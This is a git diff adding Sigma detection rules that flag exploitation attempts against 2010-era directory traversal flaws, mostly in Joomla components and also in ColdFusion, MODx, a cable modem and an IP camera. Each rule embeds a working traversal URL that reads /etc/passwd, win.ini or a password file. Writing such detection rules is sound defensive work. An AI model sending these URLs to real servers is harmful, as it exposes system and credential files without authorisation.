a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml new file mode 100644 index 00000000..89c97e04 --- /dev/null +++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1659 exploitation attempt +id: 10697a46-85ff-499d-8bc5-7b6219da594a +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Directory + traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component + 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) + in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml new file mode 100644 index 00000000..dca273b2 --- /dev/null +++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1714 exploitation attempt +id: c754acbf-a0ce-4df6-843e-fb1c55af5373 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory traversal + vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml new file mode 100644 index 00000000..992d7d40 --- /dev/null +++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1717 exploitation attempt +id: 54c142a2-27af-4786-a191-12c76398e63f +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory traversal + vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows + remote attackers to read arbitrary files and possibly have unspecified other impact + via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml new file mode 100644 index 00000000..b9306420 --- /dev/null +++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1718 exploitation attempt +id: 706f8907-5d0a-41db-b93f-f0ee343300b6 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Directory + traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) + component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary + local files via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml new file mode 100644 index 00000000..f11417c4 --- /dev/null +++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1719 exploitation attempt +id: e11eeb05-00e2-4d00-a572-222e6fe5e716 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Directory + traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for + Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml new file mode 100644 index 00000000..557f28d2 --- /dev/null +++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1722 exploitation attempt +id: 850fafc1-3151-48b6-b25a-41c3543df57c +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Online Market 2.x - Local File Inclusion:Directory + traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! + allows remote attackers to read arbitrary files and possibly have unspecified other + impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml new file mode 100644 index 00000000..3a52358d --- /dev/null +++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1875 exploitation attempt +id: 335b7e25-03d9-40b9-9f3a-82fdfce99af1 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Property - Local File Inclusion:Directory traversal + vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for + Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml new file mode 100644 index 00000000..20e8f0b7 --- /dev/null +++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1953 exploitation attempt +id: 72936897-8824-4fa8-9ecf-dbbc5f19e53a +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion:Directory + traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml new file mode 100644 index 00000000..30ecafe1 --- /dev/null +++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1954 exploitation attempt +id: 0159a66f-50f9-4485-b681-756fa2d16ce8 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion:Directory + traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component + 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. + (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml new file mode 100644 index 00000000..f4c424f8 --- /dev/null +++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1955 exploitation attempt +id: 9a0064ff-3544-4130-aaec-a8547645f44d +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion:Directory + traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml new file mode 100644 index 00000000..7d33c368 --- /dev/null +++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1956 exploitation attempt +id: 87412ddd-24a7-4d25-98b7-1df572fcac16 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Directory + traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 + and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml new file mode 100644 index 00000000..f91073b5 --- /dev/null +++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1979 exploitation attempt +id: c56ae44a-bf7b-4643-a2f8-6935f792684c +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Directory + traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build + 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) + in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml new file mode 100644 index 00000000..26b19ee7 --- /dev/null +++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1980 exploitation attempt +id: 33689775-59d1-4bb4-84e6-4c659819e740 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directory + traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) + component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary + local files via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml new file mode 100644 index 00000000..fa7dba17 --- /dev/null +++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1981 exploitation attempt +id: 7b1693c7-dfb2-4bc2-a100-8ff973053339 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory traversal + vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml new file mode 100644 index 00000000..7ba0e0c8 --- /dev/null +++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1983 exploitation attempt +id: 1ccbc483-aa94-436c-ae2c-c0ff89c88950 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory traversal + vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 + for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in + the view parameter to index.php +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml new file mode 100644 index 00000000..a12fc270 --- /dev/null +++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2033 exploitation attempt +id: 5f65aa73-1a1f-44f6-9df4-2a593d83ca47 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory traversal + vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x + for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml new file mode 100644 index 00000000..23959387 --- /dev/null +++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2034 exploitation attempt +id: fa7d6a2c-4fef-49cc-9b80-07edaa2687c2 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Directory + traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component + 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml new file mode 100644 index 00000000..37cd635f --- /dev/null +++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2035 exploitation attempt +id: 517f9070-1bd8-4e24-ab39-17e41e353ab6 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Directory + traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 + Beta for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml new file mode 100644 index 00000000..3f7221ee --- /dev/null +++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2036 exploitation attempt +id: 99462979-ccf6-4c28-a108-fd2d958d39e0 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Directory + traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component + 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml new file mode 100644 index 00000000..de75a78a --- /dev/null +++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2122 exploitation attempt +id: 993b1828-3194-4686-87b6-14b893a2ac1e +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Directory + traversal vulnerability in the SimpleDownload (com_simpledownload) component before + 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local + files via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml new file mode 100644 index 00000000..fe81d09a --- /dev/null +++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2259 exploitation attempt +id: 12a63c52-1a42-437a-90cc-950a4cf6b3ab +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory traversal + vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote + attackers to include and execute arbitrary local files via a .. (dot dot) in the + controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml new file mode 100644 index 00000000..e77c8288 --- /dev/null +++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-2307 exploitation attempt +id: f2029a95-84dc-427f-a112-f5e373e791ff +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - + Directory Traversal:Multiple directory traversal vulnerabilities in the web server + for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC + allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), + (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../etc/passwd + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml new file mode 100644 index 00000000..6f88ea8d --- /dev/null +++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2682 exploitation attempt +id: 93d57e84-a8e0-40c6-9d5f-679419117413 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion:Directory + traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 + for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified + other impact via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml new file mode 100644 index 00000000..8e1345f2 --- /dev/null +++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-2861 exploitation attempt +id: 51f51d47-b13c-4305-b017-f367e790e2cd +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory traversal + vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier + allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, + (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, + and (5) enter.cfm in CFIDE/administrator/. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml new file mode 100644 index 00000000..da22cf06 --- /dev/null +++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-2920 exploitation attempt +id: e5195f58-f828-4ab2-a609-23eaaf46de44 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion:Directory + traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component + 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory + traversal sequences in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml new file mode 100644 index 00000000..6bb330c8 --- /dev/null +++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-3426 exploitation attempt +id: aa48eb4c-9028-4d0f-b6be-83f52bc805f7 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directory + traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha + 3 for Joomla! allows remote attackers to include and execute arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml new file mode 100644 index 00000000..a0476b22 --- /dev/null +++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-4231 exploitation attempt +id: c60db1d4-a919-4cbc-bcba-3271b2fd0e6b +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Camera + has a built-in web server that is enabled by default. The server is vulnerable to + directory transversal attacks, allowing access to any file on the camera file system. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../../../../../../../../../../../../etc/passwd + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml new file mode 100644 index 00000000..33f2bc11 --- /dev/null +++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-4617 exploitation attempt +id: a7745670-2ad1-411a-8e6d-c43bc9942139 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory traversal + vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows + remote attackers to read arbitrary files via directory traversal sequences in the + section parameter to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml new file mode 100644 index 00000000..14abd22d --- /dev/null +++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-5278 exploitation attempt +id: 37dbe173-d9f1-400b-862e-cceef489ef6f +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: MODx manager - Local File Inclusion:Directory traversal vulnerability + in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and + possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to + read arbitrary files via a .. (dot dot) in the class_key parameter. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml deleted file mode 100644 index a6ec1f7d..00000000 --- a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-0943 exploitation attempt -id: fa7e28e3-d286-4c38-b6df-41eb004b66ba -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter in a jashowcase action to index.php. -references: -- https://www.exploit-db.com/exploits/11090 -- 